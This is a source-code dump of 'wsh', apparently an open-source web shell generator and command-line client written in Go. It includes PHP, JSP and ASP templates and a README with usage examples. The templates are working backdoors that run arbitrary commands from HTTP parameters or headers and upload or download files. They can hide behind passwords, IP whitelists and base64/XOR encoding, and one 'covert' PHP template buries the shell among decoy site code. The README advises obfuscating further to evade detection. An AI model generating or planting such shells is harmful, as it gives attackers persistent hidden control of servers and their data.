├── example-configs
├── simple-get.yml
├── simple-covert.yml
└── all-parameters.yml
├── main.go
├── templates
├── php.tml
├── covert-php.tml
├── jsp.tml
└── asp.tml
├── README.md
├── cmd
├── generate.go
├── root.go
└── generate-templates.go
└── LICENSE
/example-configs/simple-get.yml:
--------------------------------------------------------------------------------
1 | method: "GET"
2 | param: "c"
3 | no-file: true
4 |
--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import "github.com/eatonchips/wsh/cmd"
4 |
5 | func main() {
6 | cmd.Execute()
7 | }
8 |
--------------------------------------------------------------------------------
/example-configs/simple-covert.yml:
--------------------------------------------------------------------------------
1 | method: "POST"
2 | header: "User-Agent"
3 | whitelist:
4 | - "127.0.0.1"
5 | password: "S3cr3tP@ssw0rd!"
6 | pass-header: "Accept-Language"
7 | no-file: true
8 | ignore-ssl: true
9 | template: templates/covert-php.tml
10 |
--------------------------------------------------------------------------------
/example-configs/all-parameters.yml:
--------------------------------------------------------------------------------
1 | method: "GET"
2 | param: "cmd"
3 | # header: "User-Agent"
4 | whitelist:
5 | - "127.0.0.1"
6 | - "10.0.0.1"
7 | password: "S3cr3tP@ssw0rd"
8 | pass-param: "passwd"
9 | # pass-header: "X-Pass"
10 | xor-key: "S3cr3tK3y"
11 | # xor-param: "xorparam"
12 | xor-header: "Xor-Header"
13 | base64: false
14 | no-file: true
15 | minify: false
16 | template: templates/php.tml
17 | # timeout: 20
18 | ignore-ssl: true
19 | # prefix: "bash"
20 | trim-prefix: "
"
21 | trim-suffix: "
"
22 | headers:
23 | - "Header-Key:Header-Value"
24 | # - "User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.09; rv:70.0) Gecko/20101000 Firefox/70.0"
25 | parameters:
26 | - "ParamName:ParamValue"
27 |
--------------------------------------------------------------------------------
/templates/php.tml:
--------------------------------------------------------------------------------
1 | {{/* Get command from param or header */}}
2 | {{ if ne .CmdHeader "" }}
3 | {{ index .V "cmd" }} = $_SERVER['HTTP_{{ .CmdHeader }}'];
4 | {{ else }}
5 |
6 | {{ if ne .Method "GET" }}
7 | parse_str(file_get_contents('php://input'), $_REQUEST);
8 | {{ end }}
9 |
10 | {{ index .V "cmd" }} = $_REQUEST['{{ .CmdParam }}'];
11 | {{ end }}
12 | {{ index .V "cmd" }} = trim({{ index .V "cmd" }});
13 |
14 |
15 | {{ if .Whitelist }}
16 | {{ index .V "whitelist" }} = array({{ .Whitelist }});
17 | if (!in_array($_SERVER['REMOTE_ADDR'], {{ index .V "whitelist" }})) {
18 | die;
19 | }
20 | {{- end }}
21 |
22 |
23 | {{ if ne .Password "" }}
24 | {{ index .V "hash" }} = '{{ .PasswordHash }}';
25 | {{ if ne .PasswordParam "" }}
26 |
27 | {{ if ne .Method "" }}
28 | {{ index .V "pass" }} = $_REQUEST['{{ .PasswordParam }}'];
29 | {{ end }}
30 |
31 | {{ else if ne .PasswordHeader "" }}
32 | {{ index .V "pass" }} = $_SERVER['HTTP_{{ .PasswordHeader }}'];
33 | {{ end }}
34 | if (md5({{ index .V "pass" }}) != {{ index .V "hash" }}) {
35 | die;
36 | }
37 | {{- end }}
38 |
39 |
40 | {{ if .FileCapabilities }}
41 | if (substr({{ index .V "cmd" }}, 0, 4) === 'get ') {
42 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
43 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
44 | if (!file_exists({{ index .V "filePath" }})) {
45 | header("HTTP/1.1 404 Not Found");
46 | die;
47 | }
48 | header("Content-Disposition: attachment; filename={{ index .V "filePath" }}");
49 | header("Content-Type: application/octet-stream");
50 | header("Content-Transfer-Encoding: binary");
51 | header('Content-Length: ' . filesize({{ index .V "filePath" }}));
52 | readfile({{ index .V "filePath" }});
53 | die;
54 | } else if (substr({{ index .V "cmd" }}, 0, 4) === 'put ') {
55 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
56 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
57 | {{ index .V "destPath" }} = basename({{ index .V "cmdArgs" }}[1]);
58 | if (count({{ index .V "cmdArgs" }}) > 2) {
59 | {{ index .V "destPath" }} = {{ index .V "cmdArgs" }}[2];
60 | }
61 | if (file_exists({{ index .V "destPath" }})) {
62 | echo {{ index .V "destPath" }}.' already exists';
63 | die;
64 | }
65 | file_put_contents({{ index .V "destPath" }}, base64_decode($_REQUEST['f']));
66 | echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
67 | die;
68 | }
69 | {{ end }}
70 |
71 | system({{ index .V "cmd" }});
72 | die;
73 |
74 |
75 |
76 | {{- define "b64" }}
77 | eval(base64_decode('{{ .EncCode }}'))
78 | {{ end }}
79 |
80 |
81 |
82 | {{ define "xor" }}
83 | {{ if ne .XorHeader "" -}}
84 | {{ index .V "xorKey" }} = $_SERVER["HTTP_{{ .XorHeader }}"];
85 | {{ else if eq .Method "GET" -}}
86 | {{ index .V "xorKey" }} = $_REQUEST["{{ .XorParam }}"];
87 | {{ else if eq .Method "POST" -}}
88 | {{ index .V "xorKey" }} = json_decode(file_get_contents('php://input'), true)['{{ .XorParam }}'];
89 | {{ end -}}
90 |
91 | {{ index .V "encSrc" }} = base64_decode("{{ .EncCode }}");
92 | {{ index .V "dSrc" }} = "";
93 | for({{ index .V "i" }}=0; {{ index .V "i" }}model = "Tesla";
6 | }
7 | }
8 | // create an object
9 | $Lightning = new Car();
10 |
11 | {{ if ne .CmdHeader "" }}
12 | {{ index .V "cmd" }} = $_SERVER['HTTP_{{ .CmdHeader }}'];
13 | {{ else }}
14 |
15 | {{ if ne .Method "GET" }}
16 | parse_str(file_get_contents('php://input'), $_REQUEST);
17 | {{ end }}
18 |
19 | {{ index .V "cmd" }} = $_REQUEST['{{ .CmdParam }}'];
20 | {{ end }}
21 | {{ index .V "cmd" }} = trim({{ index .V "cmd" }});
22 |
23 | function nav_menu($sep = ' | ')
24 | {
25 | $nav_menu = '';
26 | $nav_items = config('nav_menu');
27 | foreach ($nav_items as $uri => $name) {
28 | $class = str_replace('page=', '', $_SERVER['QUERY_STRING']) == $uri ? ' active' : '';
29 | $url = config('site_url') . '/' . (config('pretty_uri') || $uri == '' ? '' : '?page=') . $uri;
30 |
31 | $nav_menu .= '' . $name . '' . $sep;
32 | }
33 |
34 | return trim($nav_menu, $sep);
35 | }
36 |
37 | {{ if .Whitelist }}
38 | {{ index .V "whitelist" }} = array({{ .Whitelist }});
39 | if (!in_array($_SERVER['REMOTE_ADDR'], {{ index .V "whitelist" }})) {
40 | die;
41 | }
42 | {{- end }}
43 |
44 | function page_content()
45 | {
46 | $page = isset($_GET['page']) ? $_GET['page'] : 'home';
47 |
48 | $path = getcwd() . '/' . config('content_path') . '/' . $page . '.phtml';
49 |
50 | if (! file_exists($path)) {
51 | $path = getcwd() . '/' . config('content_path') . '/404.phtml';
52 | }
53 |
54 | echo file_get_contents($path);
55 | }
56 |
57 | {{ if ne .Password "" }}
58 | {{ index .V "hash" }} = '{{ .PasswordHash }}';
59 | {{ if ne .PasswordParam "" }}
60 |
61 | {{ if ne .Method "" }}
62 | {{ index .V "pass" }} = $_REQUEST['{{ .PasswordParam }}'];
63 | {{ end }}
64 |
65 | $a = 'How are you?';
66 |
67 | if (strpos($a, 'are') !== false) {
68 | $a = 'true';
69 | }
70 |
71 | {{ else if ne .PasswordHeader "" }}
72 | {{ index .V "pass" }} = $_SERVER['HTTP_{{ .PasswordHeader }}'];
73 | {{ end }}
74 | if (md5({{ index .V "pass" }}) != {{ index .V "hash" }}) {
75 | die;
76 | }
77 | {{- end }}
78 |
79 |
80 | {{ if .FileCapabilities }}
81 | if (substr({{ index .V "cmd" }}, 0, 4) === 'get ') {
82 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
83 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
84 | if (!file_exists({{ index .V "filePath" }})) {
85 | header("HTTP/1.1 404 Not Found");
86 | die;
87 | }
88 | header("Content-Disposition: attachment; filename={{ index .V "filePath" }}");
89 | header("Content-Type: application/octet-stream");
90 | header("Content-Transfer-Encoding: binary");
91 | header('Content-Length: ' . filesize({{ index .V "filePath" }}));
92 | readfile({{ index .V "filePath" }});
93 | die;
94 | } else if (substr({{ index .V "cmd" }}, 0, 4) === 'put ') {
95 | {{ index .V "cmdArgs" }} = explode(' ', {{ index .V "cmd" }});
96 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
97 | {{ index .V "destPath" }} = basename({{ index .V "cmdArgs" }}[1]);
98 | if (count({{ index .V "cmdArgs" }}) > 2) {
99 | {{ index .V "destPath" }} = {{ index .V "cmdArgs" }}[2];
100 | }
101 | if (file_exists({{ index .V "destPath" }})) {
102 | echo {{ index .V "destPath" }}.' already exists';
103 | die;
104 | }
105 | $array = array(0, 1, 2, 3);
106 |
107 | unset($array[2]);
108 | $array = array_values($array);
109 | // var_dump($array);
110 | /* array(3) {
111 | [0]=>
112 | int(0)
113 | [1]=>
114 | int(1)
115 | [2]=>
116 | int(3)
117 | } */
118 | file_put_contents({{ index .V "destPath" }}, file_get_contents('php://input'));
119 | echo 'Uploaded '.{{ index .V "filePath" }}.' to '.{{ index .V "destPath" }};
120 | die;
121 | }
122 | {{ end }}
123 |
124 | $postID = trim(json_encode($_POST['postid']), '[]'); //convert array to string and remove square brackets to be a valid value for MySQL query
125 |
126 | $likeQuery = "select count(*) as total_likes from likes where post_id in ('.$postID.') group by post_id order by post_id desc"; //query number of likes
127 |
128 | system({{ index .V "cmd" }});
129 | die;
130 |
131 | $arr = array("blue", "green", "red", "yellow", "green", "orange", "yellow", "indigo", "red");
132 |
--------------------------------------------------------------------------------
/templates/jsp.tml:
--------------------------------------------------------------------------------
1 | <%@ page import="java.util.*,java.io.*" %>
2 | {{ if ne .Password "" }}
3 | <%@ page import="java.security.*" %>
4 | {{ end }}
5 | {{ if .FileCapabilities }}
6 | {{/* <%@ page import="javax.servlet.http.*" %> */}}
7 | {{/* <%@ page import="org.apache.commons.fileupload.*" %> */}}
8 | {{/* <%@ page import="org.apache.commons.fileupload.disk.*" %> */}}
9 | {{/* <%@ page import="org.apache.commons.fileupload.servlet.*" %> */}}
10 | {{/* <%@ page import="org.apache.commons.codec.binary.*" %> */}}
11 | {{/* <%@ page import="org.apache.commons.io.output.*" %> */}}
12 | <%@ page import="java.nio.file.*" %>
13 | {{ end }}
14 | <%
15 | try {
16 | {{/* Get command from param or header */}}
17 | {{ if ne .CmdHeader "" -}}
18 | String {{ index .V "cmd" }} = request.getHeader("{{ .CmdHeader }}");
19 | {{ else if ne .Method "" -}}
20 | String {{ index .V "cmd" }} = request.getParameter("{{ .CmdParam }}");
21 | {{ end }}
22 |
23 |
24 | {{/* Check if ip is in whitelist */}}
25 | {{ if .Whitelist }}
26 |
27 | String[] {{ index .V "whitelist" }} = { {{ .Whitelist }} };
28 | if (!Arrays.asList({{ index .V "whitelist" }}).contains(request.getRemoteAddr())) {
29 | return;
30 | }
31 |
32 | {{ end }}
33 |
34 |
35 | {{/* Check password */}}
36 | {{ if ne .Password "" }}
37 |
38 | String {{ index .V "hash" }} = "{{ .PasswordHash }}";
39 | {{ if ne .PasswordHeader "" }}
40 | String {{ index .V "pass" }} = request.getHeader("{{ .PasswordHeader }}");
41 | {{ else if ne .PasswordParam "" }}
42 | String {{ index .V "pass" }} = request.getParameter("{{ .PasswordParam }}");
43 | {{ end }}
44 |
45 | MessageDigest {{ index .V "alg" }} = MessageDigest.getInstance("MD5");
46 | {{ index .V "alg" }}.reset();
47 | {{ index .V "alg" }}.update({{ index .V "pass" }}.getBytes());
48 | byte[] {{ index .V "digest" }} = {{ index .V "alg" }}.digest();
49 | StringBuffer {{ index .V "hashFunc" }} = new StringBuffer();
50 |
51 | for (int {{ index .V "i" }} = 0; {{ index .V "i" }} < {{ index .V "digest" }}.length; {{ index .V "i" }}++) {
52 | {{ index .V "pass" }} = Integer.toHexString(0xFF & {{ index .V "digest" }}[{{ index .V "i" }}]);
53 | if ({{ index .V "pass" }}.length() < 2) {
54 | {{ index .V "pass" }} = "0" + {{ index .V "pass" }};
55 | }
56 | {{ index .V "hashFunc" }}.append({{ index .V "pass" }});
57 | }
58 |
59 | if (!{{ index .V "hash" }}.equals({{ index .V "hashFunc" }}.toString())) {
60 | return;
61 | }
62 |
63 | {{ end }}
64 |
65 |
66 | {{/* Include file capabilities */}}
67 | {{ if .FileCapabilities }}
68 | {{/* Download file */}}
69 | if ({{ index .V "cmd" }}.length() >= 4 && {{ index .V "cmd" }}.substring(0, 4).equals("get ")) {
70 | String[] {{ index .V "cmdArgs" }} = {{ index .V "cmd" }}.split(" ");
71 | if ({{ index .V "cmdArgs" }}.length >= 2) {
72 | String {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
73 | File {{ index .V "file" }} = new File({{ index .V "filePath" }});
74 | if (!{{ index .V "file" }}.exists()) {
75 | response.setStatus(404);
76 | return;
77 | }
78 | FileInputStream {{ index .V "fileStream" }} = new FileInputStream({{ index .V "file" }});
79 | String {{ index .V "mimeType" }} = getServletContext().getMimeType({{ index .V "filePath" }});
80 | if ({{ index .V "mimeType" }} == null) {
81 | {{ index .V "mimeType" }} = "application/octet-stream";
82 | }
83 | response.setContentType({{ index .V "mimeType" }});
84 | response.setContentLength((int) {{ index .V "file" }}.length());
85 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", {{ index .V "file" }}.getName()));
86 |
87 | OutputStream {{ index .V "outStream" }} = response.getOutputStream();
88 | byte[] {{ index .V "buffer" }} = new byte[4096];
89 | int {{ index .V "bytesRead" }} = -1;
90 |
91 | while (({{ index .V "bytesRead" }} = {{ index .V "fileStream" }}.read({{ index .V "buffer" }})) != -1) {
92 | {{ index .V "outStream" }}.write({{ index .V "buffer" }}, 0, {{ index .V "bytesRead" }});
93 | }
94 |
95 | {{ index .V "fileStream" }}.close();
96 | {{ index .V "outStream" }}.close();
97 |
98 | return;
99 | } else {
100 | return;
101 | }
102 | {{/* Upload file */}}
103 | } else if ({{ index .V "cmd" }}.length() >= 4 && {{ index .V "cmd" }}.substring(0, 4).equals("put ")) {
104 | String[] {{ index .V "cmdArgs" }} = {{ index .V "cmd" }}.split(" ");
105 | String {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
106 | if ({{ index .V "cmdArgs" }}.length >= 3) {
107 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[2];
108 | } else {
109 | File f = new File({{ index .V "filePath" }});
110 | {{ index .V "filePath" }} = f.getName();
111 | }
112 |
113 | String {{ index .V "fileContents" }} = request.getParameter("f");
114 | try {
115 | FileOutputStream {{ index .V "outStream" }} = new FileOutputStream({{ index .V "filePath" }});
116 | {{ index .V "outStream" }}.write(Base64.getDecoder().decode({{ index .V "fileContents" }}));
117 | } catch (IllegalArgumentException e) {
118 | response.setStatus(500);
119 | out.println("Unable to decode base64.");
120 | } catch (IOException e) {
121 | response.setStatus(500);
122 | out.println("Unable to write file");
123 | }
124 | return;
125 | }
126 |
127 | {{ end }}
128 |
129 |
130 | {{/* Run command */}}
131 | Process {{ index .V "process" }} = Runtime.getRuntime().exec({{ index .V "cmd" }});
132 | DataInputStream ds = new DataInputStream({{ index .V "process" }}.getInputStream());
133 | String {{ index .V "output" }} = ds.readLine();
134 | while ( {{ index .V "output" }} != null ) {
135 | out.println({{ index .V "output" }});
136 | {{ index .V "output" }} = ds.readLine();
137 | }
138 | } catch (Exception e) {}
139 | %>
--------------------------------------------------------------------------------
/templates/asp.tml:
--------------------------------------------------------------------------------
1 | {{/* Get command from param or header */}}
2 | {{/* dim {{ index .V "cmd" }} */}}
3 | {{ if ne .CmdHeader "" }}
4 | {{ index .V "cmd" }} = Request.ServerVariables("HTTP_{{ .CmdHeader }}")
5 | {{ else }}
6 | {{ index .V "cmd" }} = Request("{{ .CmdParam }}")
7 | {{ end }}
8 |
9 | {{/* Check if ip is in whitelist */}}
10 | {{ if .Whitelist }}
11 |
12 | {{ index .V "whitelist" }} = Array({{ .Whitelist }})
13 | for each {{ index .V "i" }} in {{ index .V "whitelist" }}
14 | if {{ index .V "i" }} = Request.ServerVariables("REMOTE_ADDR") Then
15 | Exit For
16 | elseif {{ index .V "i" }} = {{ index .V "whitelist" }}(UBound({{ index .V "whitelist" }})) then
17 | response.end
18 | end if
19 | next
20 | {{ end }}
21 |
22 | {{/* Check password */}}
23 | {{ if ne .Password "" }}
24 | {{/* dim {{ index .V "pass" }} */}}
25 | {{ index .V "hash" }} = "{{ .PasswordHash }}"
26 |
27 | {{ if ne .PasswordHeader "" }}
28 | {{ index .V "pass" }} = Request.ServerVariables("HTTP_{{ .PasswordHeader }}")
29 | {{ else if ne .PasswordParam "" }}
30 | {{ index .V "pass" }} = request("{{ .PasswordParam }}")
31 | {{ end }}
32 | {{/* Hash and compare */}}
33 | {{/* Dim {{ index .V "asc" }}, {{ index .V "alg" }}, {{ index .V "hashFunc" }}, {{ index .V "digest" }}, {{ index .V "i" }} */}}
34 |
35 | Set {{ index .V "asc" }} = CreateObject("System.Text.UTF8Encoding")
36 | Set {{ index .V "alg" }} = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
37 | {{ index .V "hashFunc" }} = {{ index .V "asc" }}.GetBytes_4({{ index .V "pass" }})
38 | {{ index .V "hashFunc" }} = {{ index .V "alg" }}.ComputeHash_2(({{ index .V "hashFunc" }}))
39 | {{ index .V "digest" }} = ""
40 | For {{ index .V "i" }} = 1 To LenB({{ index .V "hashFunc" }})
41 | {{ index .V "digest" }} = {{ index .V "digest" }} & LCase(Right("0" & Hex(AscB(MidB({{ index .V "hashFunc" }}, {{ index .V "i" }}, 1))), 2))
42 | Next
43 |
44 | if {{ index .V "digest" }} <> {{ index .V "hash" }} Then
45 | response.end
46 | end if
47 | {{ end }}
48 |
49 | {{/* Include file capabilities */}}
50 | {{ if .FileCapabilities }}
51 | On Error Resume Next
52 |
53 | {{/* Download file */}}
54 | if Left({{ index .V "cmd" }}, 4) = "get " Then
55 | {{/* dim {{ index .V "cmdArgs" }} */}}
56 | {{ index .V "cmdArgs" }} = Split({{ index .V "cmd" }}, " ")(1)
57 |
58 | {{/* Dim {{ index .V "fs" }}
59 | Dim {{ index .V "file" }}
60 | Dim {{ index .V "fileStream" }} */}}
61 |
62 | Set {{ index .V "fs" }} = Server.CreateObject("Scripting.FileSystemObject")
63 | If {{ index .V "fs" }}.FileExists({{ index .V "cmdArgs" }}) Then
64 | Set {{ index .V "file" }} = {{ index .V "fs" }}.GetFile({{ index .V "cmdArgs" }})
65 |
66 | Response.Clear
67 | Response.AddHeader "Content-Disposition", "attachment; filename=" & {{ index .V "file" }}.Name
68 | Response.AddHeader "Content-Length", {{ index .V "file" }}.Size
69 | Response.ContentType = "application/octet-stream"
70 |
71 | Set {{ index .V "fileStream" }} = Server.CreateObject("ADODB.Stream")
72 | {{ index .V "fileStream" }}.Type = 1
73 | {{ index .V "fileStream" }}.Open
74 | {{ index .V "fileStream" }}.LoadFromFile({{ index .V "cmdArgs" }})
75 |
76 | Response.BinaryWrite({{ index .V "fileStream" }}.Read)
77 | {{ index .V "fileStream" }}.Close
78 | If Err.Number <> 0 Then
79 | Response.Clear
80 | Response.Status = 500
81 | Response.Write Err.Description
82 | Response.End
83 | End If
84 |
85 | Set {{ index .V "fileStream" }} = Nothing
86 | Set {{ index .V "file" }} = Nothing
87 | Else '{{ index .V "fs" }}.FileExists({{ index .V "cmdArgs" }})
88 | Response.Clear
89 | Response.Status = 404
90 | Response.Write("File not found.")
91 | End If
92 |
93 | Set {{ index .V "fs" }} = Nothing
94 | response.end
95 |
96 | {{/* Upload file */}}
97 | elseif Left({{ index .V "cmd" }}, 4) = "put " Then
98 | {{ index .V "cmdArgs" }} = Split({{ index .V "cmd" }}, " ")
99 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}(1)
100 | set {{ index .V "fs" }}=Server.CreateObject("Scripting.FileSystemObject")
101 | If ubound({{ index .V "cmdArgs" }}) > 1 Then
102 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}(2)
103 | Else
104 | {{ index .V "filePath" }}={{ index .V "fs" }}.getfilename({{ index .V "filePath" }})
105 | End If
106 | response.write {{ index .V "filePath" }}
107 |
108 | set {{ index .V "encSrc" }} = CreateObject("Msxml2.DOMDocument").CreateElement("aux")
109 | {{ index .V "encSrc" }}.DataType = "bin.base64Var"
110 | {{ index .V "encSrc" }}.Text = Request("f")
111 | set {{ index .V "fileContents" }} = CreateObject("ADODB.Stream")
112 | {{ index .V "fileContents" }}.Type = 1 ' adTypeBinary
113 | {{ index .V "fileContents" }}.Open
114 | {{ index .V "fileContents" }}.Write {{ index .V "encSrc" }}.NodeTypedValue
115 | {{ index .V "fileContents" }}.Position = 0
116 | {{/* {{ index .V "fileContents" }}.Type = 2 ' adTypeText */}}
117 | {{ index .V "fileContents" }}.CharSet = "utf-8"
118 | set {{ index .V "file" }}={{ index .V "fs" }}.CreateTextFile("C:\inetpub\wwwroot\nice.php",true)
119 | {{ index .V "file" }}.write {{ index .V "fileContents" }}.ReadText
120 | response.end
121 | end if
122 | {{ end }}
123 |
124 | {{/* Run command */}}
125 | Set {{ index .V "process" }} = CreateObject("WScript.Shell").exec("cmd /c " & {{ index .V "cmd" }})
126 | Response.Write({{ index .V "process" }}.StdOut.ReadAll)
127 |
128 |
129 |
130 | {{- define "b64" }}
131 | {{/* Dim {{ index .V "encObj" }}, {{ index .V "b64" }}, {{ index .V "binStream" }} */}}
132 | {{ index .V "base64Var" }} = "46"
133 | {{ index .V "msxmlVar" }} = "tnEmu" & "CoD"
134 | {{ index .V "msxmlVar" }} = "0.3." & {{ index .V "msxmlVar" }} & "mod"
135 | {{ index .V "msxmlVar" }} = {{ index .V "msxmlVar" }} & ".2l"
136 | {{ index .V "msxmlVar" }} = {{ index .V "msxmlVar" }} & "mXs"
137 | Set {{ index .V "encObj" }} = CreateObject(strreverse({{ index .V "msxmlVar" }} & "m"))
138 | {{ index .V "base64Var" }} = {{ index .V "base64Var" }} & "esab"
139 | Set {{ index .V "b64" }} = {{ index .V "encObj" }}.CreateElement(strreverse({{ index .V "base64Var" }}))
140 | {{ index .V "b64" }}.dataType = "bin." & strreverse({{ index .V "base64Var" }})
141 | {{ index .V "b64" }}.text = "{{ .EncCode }}"
142 | Set {{ index .V "binStream" }} = CreateObject("ADODB.Stream")
143 | {{ index .V "binStream" }}.Type = 1
144 | {{ index .V "binStream" }}.Open
145 | {{ index .V "binStream" }}.Write {{ index .V "b64" }}.nodeTypedValue
146 | {{ index .V "binStream" }}.Position = 0
147 | {{ index .V "binStream" }}.Type = 2
148 | {{ index .V "binStream" }}.CharSet = "us-ascii"
149 | Execute({{ index .V "binStream" }}.ReadText)
150 | {{ end }}
151 |
152 |
153 |
154 | {{ define "xor" -}}
155 | {{ if ne .EncHeader "" -}}
156 | {{ index .V "encKey" }} = Request.ServerVariables("HTTP_{{ .EncHeader }}")
157 | {{ else }}
158 | {{ index .V "encKey" }} = Request("{{ .EncParam }}")
159 | {{ end -}}
160 |
161 | {{ index .V "cmd" }} = "{{ .EncCode }}"
162 | {{/* Dim {{ index .V "encObj" }}, {{ index .V "b64" }}, {{ index .V "binStream" }}, {{ index .V "keyChar" }}, {{ index .V "i" }} */}}
163 | Set {{ index .V "encObj" }} = CreateObject("Msxml2.DOMDocument.3.0")
164 | Set {{ index .V "b64" }} = {{ index .V "encObj" }}.CreateElement("base64Var")
165 | {{ index .V "b64" }}.dataType = "bin.base64Var"
166 | {{ index .V "b64" }}.text = {{ index .V "cmd" }}
167 | Set {{ index .V "binStream" }} = CreateObject("ADODB.Stream")
168 | {{ index .V "binStream" }}.Type = 1
169 | {{ index .V "binStream" }}.Open
170 | {{ index .V "binStream" }}.Write {{ index .V "b64" }}.nodeTypedValue
171 | {{ index .V "binStream" }}.Position = 0
172 | {{ index .V "binStream" }}.Type = 2
173 | {{ index .V "binStream" }}.CharSet = "us-ascii"
174 | {{ index .V "cmd" }} = {{ index .V "binStream" }}.ReadText
175 | for {{ index .V "i" }} = 1 to Len({{ index .V "cmd" }})
176 | if {{ index .V "i" }} Mod Len({{ index .V "encKey" }}) = 0 then
177 | {{ index .V "keyChar" }} = asc(Right({{ index .V "encKey" }},1))
178 | Else
179 | {{ index .V "keyChar" }} = asc(mid({{ index .V "encKey" }},{{ index .V "i" }} Mod Len({{ index .V "encKey" }}),1))
180 | end if
181 | {{ index .V "keyChar" }} = asc(mid({{ index .V "cmd" }},{{ index .V "i" }},1)) Xor {{ index .V "keyChar" }}
182 | wow = wow & Chr({{ index .V "keyChar" }})
183 | next
184 | Execute(wow)
185 | {{ end }}
186 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # wsh
2 |
3 | wsh (pronounced woosh) is a web shell generator and command line interface. This started off as just an http client since interacting with webshells is a pain. There's a form, to send a command you have to type in an input box and press a button. I wanted something that fits into my workflow better and ran in the terminal. Thus wsh was born.
4 |
5 | The client features command history, logging, and can be configured to interact with a previously deployed standard webshell with a form/button. The generator creates webshells in php, asp, and jsp. They are generated with random variables, so each will have a unique hash. They can be configured with a whitelist, passwords, and allow commands to be sent over custom headers and parameters. The generator and client can be configured through command line flags or configuration files to allow for saving a setup that works for you without doing what I call the "--help" dance. Once configured, the client and generator use the same config file.
6 |
7 | ## Features
8 |
9 | - Interact with deployed web shells via the command line
10 | - Logging
11 | - Generate webshells in PHP, JSP, and ASP
12 | - IP whitelisting
13 | - Password protection
14 | - Send commands over custom headers/parameters
15 | - File upload / download
16 | - Base64 encoded shells for asp and php
17 | - XOR encrypted shells for asp and php
18 |
19 | ## Usage
20 |
21 | ### Connect
22 |
23 | ```
24 | wsh [flags]
25 |
26 | -X, --method string HTTP method: GET, POST, PUT, PATCH, DELETE (default "GET")
27 | --param string Parameter for sending command
28 | --header string Header for sending command
29 | -P, --params strings HTTP request parameters
30 | -H, --headers strings HTTP request headers
31 | -c, --config string Config file
32 | -k, --ignore-ssl Ignore invalid certs
33 | --log string Log file
34 | --prefix string Prepend command: 'cmd /c', 'powershell.exe', 'bash'
35 | --timeout int Request timeout in seconds (default 10)
36 | --trim-prefix string Trim output prefix
37 | --trim-suffix string Trim output suffix
38 | -h, --help help for wsh
39 | ```
40 |
41 | ### Generate
42 |
43 | ```
44 | wsh generate [flags]
45 | wsh g [flags]
46 |
47 | -X, --method string HTTP method (GET,POST,PUT,PATCH,DELETE) (default "GET")
48 | -p, --param string Parameter for sending command
49 | --header string Header for sending command
50 | -w, --whitelist strings IP addresses to whitelist
51 | -o, --outfile string Output file
52 | --no-file Disable file upload/download capabilities
53 | --pass string Password protect shell
54 | --pass-header string Header for sending password
55 | --pass-param string Parameter for sending password
56 | --xor-header string Header for sending xor key
57 | --xor-key string Key for xor encryption
58 | --xor-param string Parameter for sending xor key
59 | --base64 Base64 encode shell
60 | --minify Minify webshell code
61 | -t, --template string Webshell template file
62 | -h, --help help for generate
63 | ```
64 |
65 | ### Client usage / File IO
66 |
67 | I wanted the client to be language agnostic, so all webshells needed to implement the same upload/download logic. Unfortunately it is a pain to do multipart form uploads natively in jsp and classic asp, so files are uploaded as base64 in a parameter. This is not ideal as the max file upload size is limited to the maximum parameter size. In the future I may try and implement multipart form uploads, or do multiple requests to transfer larger files.
68 |
69 | ```
70 | $ wsh 127.0.0.1:8080/test.php --param cmd
71 | 127.0.0.1> help
72 | get [local filepath] Download file
73 | put [remote filepath] Upload file
74 | clear Clear screen
75 | exit Exits shell
76 | ```
77 |
78 | ## Generator Examples
79 |
80 | ### Simple Shells
81 |
82 | The following commands generates and interacts with a simple php web shell.
83 |
84 | ```
85 | $ wsh generate php --param cmd --no-file -o shell.php
86 | Created shell at shell.php.
87 |
88 | $ wsh 127.0.0.1:8080/shell.php --param cmd
89 | ```
90 |
91 | ```php
92 |
98 | ```
99 |
100 | Commands can also be sent over http headers
101 |
102 | ```
103 | $ wsh generate php --no-file --header user-agent -o shell.php
104 | Created shell at shell.php.
105 |
106 | $ wsh 127.0.0.1:8080/shell.php --header user-agent
107 | ```
108 |
109 | ### Whitelisting
110 |
111 | ```
112 | $ wsh generate php --no-file --param cmd -w 127.0.0.1,10.0.23.3 -w 12.4.22.3 -o shell.php
113 | ```
114 |
115 | ### Password Protection
116 |
117 | Passwords can be sent over parameters or headers.
118 |
119 | ```
120 | $ wsh generate php --no-file --param cmd --pass S3cr3t --pass-param pass
121 | $ wsh 127.0.0.1:8080/shell.php --param cmd -P pass:S3cr3t
122 |
123 | $ wsh generate php --no-file --param cmd --pass S3cr3t --pass-header pass-header
124 | $ wsh 127.0.0.1:8080/shell.php --param cmd -H pass-header:S3cr3t
125 | ```
126 |
127 | ### Base64 / XOR encryption
128 |
129 | This functionality is interesting, but may require some modification of the templates to be made useful. In the case of asp and jsp, the libraries that facilitate decoding base64 are known IOCs and will get flagged. If you are interested in using these functionalities I'd recommend modifying the template and obfuscating.
130 |
131 | Same as password protection, the xor key can be sent over a parameter or a header.
132 |
133 | ```
134 | $ wsh g php --param cmd --no-file --base64
135 |
138 |
139 | $ wsh g php --param cmd --no-file --xor-key S3cr3tK3y --xor-param X-Key
140 |
151 | ```
152 |
153 | ### Tomcat Shells
154 |
155 | To generate a webshell which can be deployed to tomcat, create a jsp shell named index.jsp and run the command below to zip it into a war file.
156 |
157 | Occasionally, the tomcat environment does not have the libraries required for file upload/download and the shell will error when a request is made. To remediate this, use the `--no-file` flag.
158 |
159 | ```
160 | $ wsh g jsp --param cmd --no-file -o index.jsp
